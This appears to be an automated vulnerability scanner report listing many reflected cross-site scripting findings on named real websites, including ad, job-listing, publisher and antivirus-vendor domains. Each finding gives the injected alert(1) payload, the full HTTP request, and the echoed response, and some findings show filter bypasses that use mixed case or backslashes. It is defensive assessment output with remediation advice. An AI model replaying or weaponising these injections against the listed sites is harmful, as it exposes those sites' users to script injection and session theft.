Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da81"-alert(1)-"46d128fdaa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai3da81"-alert(1)-"46d128fdaa7/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab625"-alert(1)-"aa949ccf2f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpab625"-alert(1)-"aa949ccf2f2?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21de7"-alert(1)-"6a8ac96c613 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e25"-alert(1)-"baa99d8e6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 27cec<script>alert(1)</script>80cc05fcd82 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ARTICLESEARCHQUERY_PARSER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b was submitted in the ARTICLESEARCHQUERY_PARSER parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the KEYWORDS request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 548bc\'%3balert(1)//c810fc9d02f was submitted in the KEYWORDS parameter. This input was echoed as 548bc\\';alert(1)//c810fc9d02f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 510d8<a>fae801ceba6 was submitted in the fields parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tools/XM01?queryid=QJ33020&fields=symbol%20rsrrank510d8<a>fae801ceba6&symbol=IYM HTTP/1.1
Host: orbisadvisors.redinews.com
Proxy-Connection: keep-alive
Referer: http://stockoodles.com/v1/MTSNew.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the JobId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3290"%3ba31635da494 was submitted in the JobId parameter. This input was echoed as a3290";a31635da494 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the SourcePage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f34f'-alert(1)-'dfa765092f0 was submitted in the SourcePage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/129605/AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations?SourcePage=Jobsearch8f34f'-alert(1)-'dfa765092f0&JobId=129605&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/ ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'%3bfca5fe2f801 was submitted in the REST URL parameter 2. This input was echoed as 9bb54';fca5fe2f801 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db32d'-alert(1)-'f634657a8f4 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDdb32d'-alert(1)-'f634657a8f4&JobId=131547&JobName=SiteManagement-Trainee'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!='undefine ...[SNIP]...
1.105. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sales-jobs.fins.com
Path: /Jobs/131547/SiteManagement-Trainee
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d15'-alert(1)-'b16f3950789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f7d15'-alert(1)-'b16f3950789=1&JobId=131547&JobName=SiteManagement-Trainee'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!='undefi ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f134'-alert(1)-'f9c84c54baf was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia3f134'-alert(1)-'f9c84c54baf&cobrand=ATD&JobId=131547&JobName=SiteManagement-Trainee'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script ...[SNIP]...
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d412c'-alert(1)-'1cf6036fd5b was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDd412c'-alert(1)-'1cf6036fd5b&JobId=131750&JobName=Acct-Exec-Small-Business-Sales'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!=' ...[SNIP]...
1.108. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sales-jobs.fins.com
Path: /Jobs/131750/Acct-Exec-Small-Business-Sales
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6112'-alert(1)-'19d36ec284c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f6112'-alert(1)-'19d36ec284c=1&JobId=131750&JobName=Acct-Exec-Small-Business-Sales'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)! ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 156da'-alert(1)-'1fcb5beb4d8 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia156da'-alert(1)-'1fcb5beb4d8&cobrand=ATD&JobId=131750&JobName=Acct-Exec-Small-Business-Sales'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(O ...[SNIP]...
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec4b'-alert(1)-'adbf5650abc was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD7ec4b'-alert(1)-'adbf5650abc&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(O ...[SNIP]...
1.111. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b923c'-alert(1)-'c322821b1b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&b923c'-alert(1)-'c322821b1b3=1&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95428'-alert(1)-'c228a9bf103 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia95428'-alert(1)-'c228a9bf103&cobrand=ATD&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; i ...[SNIP]...
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3f0cf<a>e90c4a69c92 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3baae"%3balert(1)//18e3cd7c00e was submitted in the pt parameter. This input was echoed as 3baae";alert(1)//18e3cd7c00e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /widgets/subscription/default.aspx?sid=2&pt=nl3baae"%3balert(1)//18e3cd7c00e&pv=N42&dn=default HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6040d"%3balert(1)//c2ca12fcdf3 was submitted in the pv parameter. This input was echoed as 6040d";alert(1)//c2ca12fcdf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /widgets/subscription/default.aspx?sid=2&pt=nl&pv=N426040d"%3balert(1)//c2ca12fcdf3&dn=default HTTP/1.1
Host: services.harpercollins.com
Proxy-Connection: keep-alive
Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f773"%3balert(1)//ee38c3c5290 was submitted in the mid parameter. This input was echoed as 2f773";alert(1)//ee38c3c5290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 24aec%3balert(1)//c4608435b21 was submitted in the pt parameter. This input was echoed as 24aec;alert(1)//c4608435b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//Widget variable declarations var WidgetId2nl24aec;alert(1)//c4608435b21n42default = 99; var SiteId2nl24aec;alert(1)//c4608435b21n42default = 2; var ProgramType2nl24aec;alert(1)//c4608435b21n42default = "nl"; var ProgramValue2nl24aec;alert(1)//c4 ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript rest-of-line comment. The payload f1c69%0aalert(1)//6c8b0e2d7df was submitted in the pt parameter. This input was echoed as f1c69 alert(1)//6c8b0e2d7df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write("<font class=\"fontGlobal2nlf1c69 alert(1)//6c8b0e2d7dfn42default\"><div id=\"divHCWidgetHead2nlf1c69 alert(1)//6c8b0e2d7dfn42default\"></div>"); document.write("<div ...[SNIP]... 42default = "Sign me up to receive news about books that explore biography, memoir, history, politics and more."; var strProgramText2nlf1c69 alert(1)//6c8b0e2d7dfn42default = GetProgramText2nlf1c69 alert(1)//6c8b0e2d7dfn42default("Notable Nonfiction", "nl"); var strProgramType2nlf1c69 alert(1)//6c8b0e2d7dfn42default = GetProgramType2nlf1c69 alert(1)//6c8b0e2d7dfn42default("nl"); var iCurrentState2nl ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8a6"%3balert(1)//38558cd33d2 was submitted in the pt parameter. This input was echoed as 1f8a6";alert(1)//38558cd33d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pv request parameter is copied into a JavaScript rest-of-line comment. The payload 69597%0aalert(1)//11e60e246fb was submitted in the pv parameter. This input was echoed as 69597 alert(1)//11e60e246fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 49a73%3balert(1)//ca8a8f2ac10 was submitted in the pv parameter. This input was echoed as 49a73;alert(1)//ca8a8f2ac10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//Widget variable declarations var WidgetId2at3282849a73;alert(1)//ca8a8f2ac10default = 69; var SiteId2at3282849a73;alert(1)//ca8a8f2ac10default = 2; var ProgramType2at3282849a73;alert(1)//ca8a8f2ac10default = "at"; var ProgramValue2at3282849a73;alert( ...[SNIP]...
The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f251e"%3balert(1)//83887f6d667 was submitted in the pv parameter. This input was echoed as f251e";alert(1)//83887f6d667 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 8850a<script>alert(1)</script>4dcd5ba057e was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 58f06<script>alert(1)</script>98b93e06103 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../2/onStatus..null..... .Iflex.messaging.messages.ErrorMessage.correlationId.I61A9427B-C408-65D3-7F57-44F2D2FA737D.faultCode.5AM ...[SNIP]... /v1/market/amfphp/core/shared/app/BasicActions.php on line 25.faultString..AThe classpath folder {/mnt/stor10-wc2-dfw1/577993/www.stockoodles.com/web/content/v1/market/amfphp/services/BasicUtilsService58f06<script>alert(1)</script>98b93e06103.php} does not exist. You probably misplaced your service..
The value of the 4th AMF string parameter is copied into the HTML document as plain text between tags. The payload c8ab3<script>alert(1)</script>ed4afefc687 was submitted in the 4th AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f29a7<script>alert(1)</script>178e29b8bea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d35f0<script>alert(1)</script>ba7454ce186 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <hea ...[SNIP]... <p>Page /ci/redirect/enduserd35f0<script>alert(1)</script>ba7454ce186/enduser/ask.php?p_sid=bw7EGuDk not found.</p> ...[SNIP]...
1.128. http://updates.webroot.com/autorenewal/auto_renewal_optout.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://updates.webroot.com
Path: /autorenewal/auto_renewal_optout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41245"><script>alert(1)</script>426159b056e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 121f5<script>alert(1)</script>5cffe219be1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3196c<script>alert(1)</script>7f76aab143d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
